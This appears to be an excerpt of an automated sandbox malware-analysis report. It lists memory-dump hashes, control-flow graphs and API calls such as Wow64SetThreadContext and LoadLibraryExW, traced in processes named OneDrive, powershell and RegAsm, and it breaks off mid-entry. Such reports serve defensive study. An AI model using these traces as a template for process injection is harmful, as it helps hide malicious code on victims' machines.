                                    • Opcode ID: 413824aa8af762885ed4754565dbb8d4cfe53d5618d3578d05bbe7cf08ae6b9c
                                    • Instruction ID: cee01495d52f8a1d3f00dcaa3d6129ea74af73d625abe1a8b7e9142424cbac3f
                                    • Opcode Fuzzy Hash: 413824aa8af762885ed4754565dbb8d4cfe53d5618d3578d05bbe7cf08ae6b9c
                                    • Instruction Fuzzy Hash: A621C3B5801259DFDB10CF9AD985ADEFBF8FB48320F10842AE958A7251C374A644CFA5

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 328 1693be6-1693c28 329 1693c2a-1693c32 328->329 330 1693c34-1693c59 Wow64SetThreadContext 328->330 329->330 331 1693c60 330->331 332 1693c69-1693c8a 331->332 333 1693c62-1693c68 331->333 333->332
                                    APIs
                                    • Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,?,0169356C), ref: 01693C53
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.1717498322.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_1690000_OneDrive.jbxd
                                    Similarity
                                    • API ID: ContextThreadWow64
                                    • String ID:
                                    • API String ID: 983334009-0
                                    • Opcode ID: 474dbb0e70fb730074a3d264d324c23dcd6991f33357c7f3ed32282618e20ce8
                                    • Instruction ID: 1278040f5b8be5f514058c56665fce1ece0bf4dacde8567e40394ad55db91d91
                                    • Opcode Fuzzy Hash: 474dbb0e70fb730074a3d264d324c23dcd6991f33357c7f3ed32282618e20ce8
                                    • Instruction Fuzzy Hash: D01112B19006498FDB10CFAAC844BDEBBF8BB88320F14802AD458A7310D338A545CFA1
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.1705712840.000000000142D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0142D000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_142d000_OneDrive.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 436f29916874a83c4c631c9beab38dd37f83d5f6cdcb2a438a9825246168cb70
                                    • Instruction ID: 18332a22e3603d5ef3db45e5d8d682a5489d4d57b261ea0dd7389d69ed2dec70
                                    • Opcode Fuzzy Hash: 436f29916874a83c4c631c9beab38dd37f83d5f6cdcb2a438a9825246168cb70
                                    • Instruction Fuzzy Hash: 40210371904240EFDB05DF98D9C0B67BF65FB98314F60C27AE9094B266C336E496C6A1
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.1705712840.000000000142D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0142D000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_142d000_OneDrive.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                    • Instruction ID: 77e7cb966648803d285160bc21108629a1b7a6aa3f6545f62c04e697370b5e2b
                                    • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                    • Instruction Fuzzy Hash: 4F11DF72804280DFCB12CF44D9C4B56BF71FB84324F24C2AAD9090B666C33AE45ACBA1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1798242116.0000000007460000.00000040.00000800.00020000.00000000.sdmp, Offset: 07460000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7460000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4'^q$4'^q$4'^q$4'^q
                                    • API String ID: 0-1420252700
                                    • Opcode ID: ef0d8698a881e456e29f239b8da7024da8880303a9dcf073466bb0f851f98b1f
                                    • Instruction ID: 54f81484a706bfd579311c772cea2b716efcb7f8e60ac866821963dc4e6dcdf2
                                    • Opcode Fuzzy Hash: ef0d8698a881e456e29f239b8da7024da8880303a9dcf073466bb0f851f98b1f
                                    • Instruction Fuzzy Hash: 6D1239F1B442599FCB159B78C8146ABBFA2AF86310F1484ABD601CB352DF71D846C7A3
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1763119692.0000000002FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_2fc0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 425fe33833bc469fecb32e72bb37e876ead7249b0a612d077816e3cdb2755b87
                                    • Instruction ID: baaca2665618ef1010ad78ae8699c1268d982bbcb5cd94fb3ed78873d3471eab
                                    • Opcode Fuzzy Hash: 425fe33833bc469fecb32e72bb37e876ead7249b0a612d077816e3cdb2755b87
                                    • Instruction Fuzzy Hash: 5A517835A00208DFCB14DFA9D5849AEBBF5FF89324F1581A9E909A7361C731EC45CBA0
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1763119692.0000000002FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_2fc0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 3c5a3d9721f1b82810589219b79b6a5dc75b1c716a96ff0b8891651e33da4df1
                                    • Instruction ID: fc348a4f657b533e4a98f5437746a8541fa6c8addc6a31f3e3588302e2a48975
                                    • Opcode Fuzzy Hash: 3c5a3d9721f1b82810589219b79b6a5dc75b1c716a96ff0b8891651e33da4df1
                                    • Instruction Fuzzy Hash: D9D1E370A053858FC706CF28C8949AABFB0FF49350B29419AD555EF262C735EC46CBA1
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1763119692.0000000002FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_2fc0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 1331bbd07fba3c23b6b5b36f68dc484d14a8b031afcfde2aa5733848a031a7dc
                                    • Instruction ID: e0c952d02a581ad6b622b7a8a62a08355d42128cae51a35ece81cbb057405a28
                                    • Opcode Fuzzy Hash: 1331bbd07fba3c23b6b5b36f68dc484d14a8b031afcfde2aa5733848a031a7dc
                                    • Instruction Fuzzy Hash: 24917C74A002468FCB15CF59C594AAEFBB1FF48310B2485A9D915AB365C736FC91CFA0
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1798242116.0000000007460000.00000040.00000800.00020000.00000000.sdmp, Offset: 07460000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7460000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 733fbefd6e7ab1ecfb437a9e3d647b9f63a239afe3121cae2c641a9e97c9c1e4
                                    • Instruction ID: 4796dd0eb18362f2b379452bb9b618cb15c6964418f4843703ec8b97d774d158
                                    • Opcode Fuzzy Hash: 733fbefd6e7ab1ecfb437a9e3d647b9f63a239afe3121cae2c641a9e97c9c1e4
                                    • Instruction Fuzzy Hash: FE41EAF0E0424A9FCB158F69C949AAABBB2EF46714F148497C9009F355DB31E845C792
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1763119692.0000000002FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_2fc0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a0e55e2733a1a1ce6c09a6e13969faa1423efbee7d60f12bdf3ada8e87881430
                                    • Instruction ID: 1b2acafe0abfbf088ae7159ad06efe608fe5484e27a43ee2d0df3d3ba62a80cb
                                    • Opcode Fuzzy Hash: a0e55e2733a1a1ce6c09a6e13969faa1423efbee7d60f12bdf3ada8e87881430
                                    • Instruction Fuzzy Hash: 4441B174A0A3968FC702CF5CC8A459ABFB0FF5625071940DAD585DF363C625EC46CBA2
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1763119692.0000000002FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_2fc0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 838e1d912d022cc927aae5d92589f672e2435362377afb9971cb74fe18211465
                                    • Instruction ID: 22f2752d79ba38575e23bd62efe58a298e3ae5cf5fa0f4c96a21f306f6f59833
                                    • Opcode Fuzzy Hash: 838e1d912d022cc927aae5d92589f672e2435362377afb9971cb74fe18211465
                                    • Instruction Fuzzy Hash: 0121F974A0424ACFCB05DFA8D5909AABBF1FF49310B1585A9D909EB362C735EC41CBA1
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1763119692.0000000002FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_2fc0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 51deabcc6d709c91319863b2adfed17765e3e1f4bd312e560e62f42d2c8447eb
                                    • Instruction ID: b584f047ca4eeeef6575b76682ac6b0c365a0ddc1c6e1dea4f0b9d17f65c3ef5
                                    • Opcode Fuzzy Hash: 51deabcc6d709c91319863b2adfed17765e3e1f4bd312e560e62f42d2c8447eb
                                    • Instruction Fuzzy Hash: 8711F974E002198FCB04CF98D5809AEFBB1FF89350B2585A9D909AB361C331ED45CFA0
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1763119692.0000000002FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_2fc0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 9c92e4a8b8cfe398472fc0ba59adcf7511058365cd8cab81fab85a3748bd763d
                                    • Instruction ID: de6dbd0805bd1b49b56108d3506f612ecbb714ceff26ca35c78a8337c043aee1
                                    • Opcode Fuzzy Hash: 9c92e4a8b8cfe398472fc0ba59adcf7511058365cd8cab81fab85a3748bd763d
                                    • Instruction Fuzzy Hash: 7B11A574B053949FC705CB68C8505A9BF71FF8A210B1981EAC545DB376C635AC06CB71
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1763119692.0000000002FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_2fc0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 63ba74a205125f3cbbc1938f46a0d06dc54656ca1db54dc8902d1a2661cbbd55
                                    • Instruction ID: e5c290755c8942553590b19458dee8e111d1e72875e55a1ce29e9f165272eef0
                                    • Opcode Fuzzy Hash: 63ba74a205125f3cbbc1938f46a0d06dc54656ca1db54dc8902d1a2661cbbd55
                                    • Instruction Fuzzy Hash: 0A01F9305092945FCB03CF5CDDA09E9BF71EF4A224B1441D7D5909B2A2C326DC45C761
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1759067333.0000000002D2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D2D000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_2d2d000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 0594026292d5a06367a5ba079c26dee297dc5f3b9294b7201b363e9beff2fa4d
                                    • Instruction ID: cebd6bed90416ed50ba1d3b90f882621bfdec1ff0cca8888bd6977e7992d5980
                                    • Opcode Fuzzy Hash: 0594026292d5a06367a5ba079c26dee297dc5f3b9294b7201b363e9beff2fa4d
                                    • Instruction Fuzzy Hash: 76012B310083109AE7104A25CF84767BFD8DF55368F28C42AED484B396C379DC49C6B1
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1759067333.0000000002D2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D2D000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_2d2d000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 7fbf9164e7b866a19566e3858969ca2714113cba899c02271167f98b8ac11bbe
                                    • Instruction ID: f094e63cc3260be10f3fbe1b44d81e30c43d90af63c932f1cda502ac31cb3aee
                                    • Opcode Fuzzy Hash: 7fbf9164e7b866a19566e3858969ca2714113cba899c02271167f98b8ac11bbe
                                    • Instruction Fuzzy Hash: 6F01526100E3D09ED7128B258994752BFB4DF57228F1DC0DBD9888F2A3C2695C49C772
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1798242116.0000000007460000.00000040.00000800.00020000.00000000.sdmp, Offset: 07460000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7460000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q
                                    • API String ID: 0-1608119003
                                    • Opcode ID: 09ea4982855c94d97f1e8ed27b864de9ce0159e1b86c2026762d41dd8f7af346
                                    • Instruction ID: dcdbd0269e1abd7bfff39c2dce0615537016dbaf136c65b68ff0767653b2d7ea
                                    • Opcode Fuzzy Hash: 09ea4982855c94d97f1e8ed27b864de9ce0159e1b86c2026762d41dd8f7af346
                                    • Instruction Fuzzy Hash: 9BF124B5B442198FCB148B68D4186ABFBE2AF85321F18847BD506CB351EE35DC85C7A2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1798242116.0000000007460000.00000040.00000800.00020000.00000000.sdmp, Offset: 07460000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7460000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q
                                    • API String ID: 0-1608119003
                                    • Opcode ID: 51dfc812bcaad37bb4182106da593baeb8a598c72f896654feba4f32f4bf951d
                                    • Instruction ID: c29a36cd87ffb0e0361d6823a4a5b5b48c57c2c5feb83f85decf00137a014449
                                    • Opcode Fuzzy Hash: 51dfc812bcaad37bb4182106da593baeb8a598c72f896654feba4f32f4bf951d
                                    • Instruction Fuzzy Hash: EAA168B1B043568FC7258A699418ABBBBE5EFC6720F24847BD445CB3A1DE31CC45C7A2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1798242116.0000000007460000.00000040.00000800.00020000.00000000.sdmp, Offset: 07460000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7460000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $^q$$^q$$^q$$^q
                                    • API String ID: 0-2125118731
                                    • Opcode ID: 18efd2fc38783de2a024a24e8fed14e0a50d526ea476f49f84ed94d3e8f0f31c
                                    • Instruction ID: 74e42779978436541fed6a7bcb949b663a168ef74cf12fd586fe17e6b8b8f0ba
                                    • Opcode Fuzzy Hash: 18efd2fc38783de2a024a24e8fed14e0a50d526ea476f49f84ed94d3e8f0f31c
                                    • Instruction Fuzzy Hash: B92149B174434A5BDB285D6A9808BA7ABEB9BC1B14F24842BE505CF385CE36C8458362
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1798242116.0000000007460000.00000040.00000800.00020000.00000000.sdmp, Offset: 07460000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7460000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4'^q$4'^q$$^q$$^q
                                    • API String ID: 0-2049395529
                                    • Opcode ID: d50607a1685b473c774e70f201467953c17601482945a2e640d75f5c4881483f
                                    • Instruction ID: a445cee533fee1822a9ddd09f92d411ddf1344f96c6622b0a0205178d73f2e81
                                    • Opcode Fuzzy Hash: d50607a1685b473c774e70f201467953c17601482945a2e640d75f5c4881483f
                                    • Instruction Fuzzy Hash: 5301F261B093D54FC72B122818285966FB69FD3A1172A44EBC041CF3A7CD184CCE83B7

                                    Execution Graph

                                    Execution Coverage:8.6%
                                    Dynamic/Decrypted Code Coverage:100%
                                    Signature Coverage:0%
                                    Total number of Nodes:90
                                    Total number of Limit Nodes:9
                                    execution_graph 14158 12e6788 DuplicateHandle 14159 12e681e 14158->14159 14160 12e4668 14161 12e4676 14160->14161 14166 12e6de0 14161->14166 14164 12e4704 14167 12e6e05 14166->14167 14175 12e6edf 14167->14175 14179 12e6ef0 14167->14179 14168 12e46e9 14171 12e421c 14168->14171 14172 12e4227 14171->14172 14187 12e8560 14172->14187 14174 12e8806 14174->14164 14177 12e6f17 14175->14177 14176 12e6ff4 14176->14176 14177->14176 14183 12e6414 14177->14183 14181 12e6f17 14179->14181 14180 12e6ff4 14181->14180 14182 12e6414 CreateActCtxA 14181->14182 14182->14180 14184 12e7370 CreateActCtxA 14183->14184 14186 12e7433 14184->14186 14188 12e856b 14187->14188 14191 12e8580 14188->14191 14190 12e88dd 14190->14174 14192 12e858b 14191->14192 14195 12e85b0 14192->14195 14194 12e89ba 14194->14190 14196 12e85bb 14195->14196 14199 12e85e0 14196->14199 14198 12e8aad 14198->14194 14200 12e85eb 14199->14200 14201 12e9e93 14200->14201 14203 12ebed1 14200->14203 14201->14198 14204 12ebeda 14203->14204 14206 12ebe91 14203->14206 14209 12ebef8 14204->14209 14212 12ebf08 14204->14212 14205 12ebee6 14205->14201 14206->14201 14210 12ebf17 14209->14210 14215 12ec003 14209->14215 14210->14205 14214 12ec003 2 API calls 14212->14214 14213 12ebf17 14213->14205 14214->14213 14216 12ec011 14215->14216 14218 12ec034 14215->14218 14216->14218 14223 12ec698 14216->14223 14227 12ec689 14216->14227 14217 12ec02c 14217->14218 14219 12ec238 GetModuleHandleW 14217->14219 14218->14210 14220 12ec265 14219->14220 14220->14210 14224 12ec6ac 14223->14224 14226 12ec6d1 14224->14226 14231 12ec294 14224->14231 14226->14217 14228 12ec698 14227->14228 14229 12ec6d1 14228->14229 14230 12ec294 LoadLibraryExW 14228->14230 14229->14217 14230->14229 14232 12ec878 LoadLibraryExW 14231->14232 14234 12ec8f1 14232->14234 14234->14226 14235 12ee120 14236 12ee12d 14235->14236 14237 12ee166 14236->14237 14239 12ec464 14236->14239 14240 12ec46f 14239->14240 14242 12ee1d8 14240->14242 14243 12ec498 14240->14243 14244 12ec4a3 14243->14244 14245 12e85e0 2 API calls 14244->14245 14246 12ee247 14245->14246 14249 12ee2c0 14246->14249 14247 12ee256 14247->14242 14250 12ee2ee 14249->14250 14251 12ee317 14250->14251 14254 12ee3bf 14250->14254 14255 12ec530 14250->14255 14253 12ee3ba KiUserCallbackDispatcher 14251->14253 14251->14254 14253->14254 14256 12ec53b 14255->14256 14259 12ec5a4 14256->14259 14258 12ee8d5 14258->14251 14260 12ec5af 14259->14260 14261 12ee990 GetFocus 14260->14261 14262 12ee989 14260->14262 14261->14262 14262->14258 14263 12e6540 14265 12e6569 14263->14265 14264 12e65ff GetCurrentProcess 14270 12e664b 14264->14270 14265->14264 14267 12e659a GetCurrentProcess 14265->14267 14268 12e65d8 GetCurrentThread 14267->14268 14271 12e65d1 14267->14271 14268->14264 14269 12e6673 GetCurrentThreadId 14272 12e66a4 14269->14272 14270->14269 14271->14268

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 536 12e6530-12e6531 537 12e6584-12e658b 536->537 538 12e6533-12e6566 536->538 539 12e6569-12e657c 537->539 541 12e658d 537->541 538->539 539->537 542 12e65ff-12e660c 541->542 543 12e658f-12e65cf GetCurrentProcess 541->543 544 12e660e-12e6614 542->544 545 12e6615-12e6649 GetCurrentProcess 542->545 549 12e65d8-12e65fb GetCurrentThread 543->549 550 12e65d1-12e65d7 543->550 544->545 547 12e664b-12e6651 545->547 548 12e6652-12e666d call 12e670f 545->548 547->548 552 12e6673-12e66a2 GetCurrentThreadId 548->552 549->542 550->549 554 12e66ab-12e670d 552->554 555 12e66a4-12e66aa 552->555 555->554
                                    APIs
                                    • GetCurrentProcess.KERNEL32 ref: 012E65BE
                                    • GetCurrentThread.KERNEL32 ref: 012E65FB
                                    • GetCurrentProcess.KERNEL32 ref: 012E6638
                                    • GetCurrentThreadId.KERNEL32 ref: 012E6691
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.2921136401.00000000012E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_12e0000_RegAsm.jbxd
                                    Similarity
                                    • API ID: Current$ProcessThread
                                    • String ID:
                                    • API String ID: 2063062207-0
                                    • Opcode ID: 1e828c28a66a174b639642b432d8d247c4b5c102abda6436a2f82bd066f4c337
                                    • Instruction ID: d9fa787e566a70d41d101ded4f62a62c75d04bf7fdc216d26f4066d5d8ba4c48
                                    • Opcode Fuzzy Hash: 1e828c28a66a174b639642b432d8d247c4b5c102abda6436a2f82bd066f4c337
                                    • Instruction Fuzzy Hash: 515166B0D10209CFDB18CFA9D548B9EBFF5BB48314F248459E119A73A0DB749984CF65

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 563 12e6540-12e6566 564 12e6569-12e658b 563->564 567 12e658d 564->567 568 12e65ff-12e660c 567->568 569 12e658f-12e65cf GetCurrentProcess 567->569 570 12e660e-12e6614 568->570 571 12e6615-12e6649 GetCurrentProcess 568->571 575 12e65d8-12e65fb GetCurrentThread 569->575 576 12e65d1-12e65d7 569->576 570->571 573 12e664b-12e6651 571->573 574 12e6652-12e666d call 12e670f 571->574 573->574 578 12e6673-12e66a2 GetCurrentThreadId 574->578 575->568 576->575 580 12e66ab-12e670d 578->580 581 12e66a4-12e66aa 578->581 581->580
                                    APIs
                                    • GetCurrentProcess.KERNEL32 ref: 012E65BE
                                    • GetCurrentThread.KERNEL32 ref: 012E65FB
                                    • GetCurrentProcess.KERNEL32 ref: 012E6638
                                    • GetCurrentThreadId.KERNEL32 ref: 012E6691
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.2921136401.00000000012E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_12e0000_RegAsm.jbxd
                                    Similarity
                                    • API ID: Current$ProcessThread
                                    • String ID:
                                    • API String ID: 2063062207-0
                                    • Opcode ID: 67ff2debd9cc8ae0438d5b8af116892d2dee969d12a6d52b1b8abb7b870b0e80
                                    • Instruction ID: b20038f4fa7fd5042bab09c32aa1ae7959b125420815997ed472859e86a50011
                                    • Opcode Fuzzy Hash: 67ff2debd9cc8ae0438d5b8af116892d2dee969d12a6d52b1b8abb7b870b0e80
                                    • Instruction Fuzzy Hash: 2D5165B0910209CFDB18CFA9D548B9EBFF1BF49304F248419E119A73A0DB749984CF65

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 611 12ec003-12ec00f 612 12ec03b-12ec03f 611->612 613 12ec011-12ec01e call 12eaf60 611->613 614 12ec053-12ec094 612->614 615 12ec041-12ec04b 612->615 620 12ec034 613->620 621 12ec020 613->621 622 12ec096-12ec09e 614->622 623 12ec0a1-12ec0af 614->623 615->614 620->612 666 12ec026 call 12ec698 621->666 667 12ec026 call 12ec689 621->667 622->623 624 12ec0d3-12ec0d5 623->624 625 12ec0b1-12ec0b6 623->625 627 12ec0d8-12ec0df 624->627 628 12ec0b8-12ec0bf call 12eaf6c 625->628 629 12ec0c1 625->629 626 12ec02c-12ec02e 626->620 630 12ec170-12ec230 626->630 631 12ec0ec-12ec0f3 627->631 632 12ec0e1-12ec0e9 627->632 634 12ec0c3-12ec0d1 628->634 629->634 661 12ec238-12ec263 GetModuleHandleW 630->661 662 12ec232-12ec235 630->662 635 12ec0f5-12ec0fd 631->635 636 12ec100-12ec109 call 12eaf7c 631->636 632->631 634->627 635->636 642 12ec10b-12ec113 636->642 643 12ec116-12ec11b 636->643 642->643 644 12ec11d-12ec124 643->644 645 12ec139-12ec146 643->645 644->645 647 12ec126-12ec136 call 12eaf8c call 12eaf9c 644->647 651 12ec148-12ec166 645->651 652 12ec169-12ec16f 645->652 647->645 651->652 663 12ec26c-12ec280 661->663 664 12ec265-12ec26b 661->664 662->661 664->663 666->626 667->626
                                    APIs
                                    • GetModuleHandleW.KERNEL32(00000000), ref: 012EC256
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.2921136401.00000000012E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_12e0000_RegAsm.jbxd
                                    Similarity
                                    • API ID: HandleModule
                                    • String ID:
                                    • API String ID: 4139908857-0
                                    • Opcode ID: 17ec4bcd458e9611c7858ed7d991a34a51fe33598f48ee2028ac8775554f6cfc
                                    • Instruction ID: 8d67d2af680bb8bbf8fd2345973fd76b5f0d752e01510b71f51bb58c38b3c714
                                    • Opcode Fuzzy Hash: 17ec4bcd458e9611c7858ed7d991a34a51fe33598f48ee2028ac8775554f6cfc
                                    • Instruction Fuzzy Hash: 767127B0A10B068FD724DF69C44475ABBF1BF88304F40892ED58ADBB50D775E959CB90

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 668 12e6414-12e7431 CreateActCtxA 671 12e743a-12e7494 668->671 672 12e7433-12e7439 668->672 679 12e7496-12e7499 671->679 680 12e74a3-12e74a7 671->680 672->671 679->680 681 12e74b8 680->681 682 12e74a9-12e74b5 680->682 684 12e74b9 681->684 682->681 684->684
                                    APIs
                                    • CreateActCtxA.KERNEL32(?), ref: 012E7421
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.2921136401.00000000012E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_12e0000_RegAsm.jbxd
                                    Similarity
                                    • API ID: Create
                                    • String ID:
                                    • API String ID: 2289755597-0
                                    • Opcode ID: 3934f73a463d2e1a1428999b239c0f4401bacc43ffb7a7292856664007fa4113
                                    • Instruction ID: 0a355a568ca480825cfa99c44ac736c6b44e4a33b6eaffb0808d489308cd8bd8
                                    • Opcode Fuzzy Hash: 3934f73a463d2e1a1428999b239c0f4401bacc43ffb7a7292856664007fa4113
                                    • Instruction Fuzzy Hash: 0E41C1B0C00619CBDB24CFA9C848BDEBBF5BF49314F64806AD508AB255DB756985CF90

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 685 12e7364-12e7431 CreateActCtxA 687 12e743a-12e7494 685->687 688 12e7433-12e7439 685->688 695 12e7496-12e7499 687->695 696 12e74a3-12e74a7 687->696 688->687 695->696 697 12e74b8 696->697 698 12e74a9-12e74b5 696->698 700 12e74b9 697->700 698->697 700->700
                                    APIs
                                    • CreateActCtxA.KERNEL32(?), ref: 012E7421
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.2921136401.00000000012E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_12e0000_RegAsm.jbxd
                                    Similarity
                                    • API ID: Create
                                    • String ID:
                                    • API String ID: 2289755597-0
                                    • Opcode ID: 63f7b065b247dd647b30a9bc82b270e9b53260a563b7637113b7df6b10f6ae95
                                    • Instruction ID: 9e0687f7aec05683a19d17209e5dfd9f1c8e91c7fc6f0418d74c3c48a6f74c10
                                    • Opcode Fuzzy Hash: 63f7b065b247dd647b30a9bc82b270e9b53260a563b7637113b7df6b10f6ae95
                                    • Instruction Fuzzy Hash: E041E2B1C00619CEDB24CFA9C944BDDBBF5BF49304F64809AD408BB255DB75698ACF90

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 701 12e6780-12e6783 703 12e6788-12e681c DuplicateHandle 701->703 704 12e681e-12e6824 703->704 705 12e6825-12e6842 703->705 704->705
                                    APIs
                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 012E680F
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.2921136401.00000000012E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_12e0000_RegAsm.jbxd
                                    Similarity
                                    • API ID: DuplicateHandle
                                    • String ID:
                                    • API String ID: 3793708945-0
                                    • Opcode ID: c7141c63b14a55edba1d339c676f309e38f28ed82c7e74e8def67546b8d53700
                                    • Instruction ID: d04902fc1c99440b262d16d54344751a496111e7f6af44e6bb1713ef9b079b5b
                                    • Opcode Fuzzy Hash: c7141c63b14a55edba1d339c676f309e38f28ed82c7e74e8def67546b8d53700
                                    • Instruction Fuzzy Hash: 082105B5D002589FDB10CF99D984AEEBFF8EB59320F14841AE954A3310D374A944CFA5

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 708 12e6788-12e681c DuplicateHandle 709 12e681e-12e6824 708->709 710 12e6825-12e6842 708->710 709->710
                                    APIs
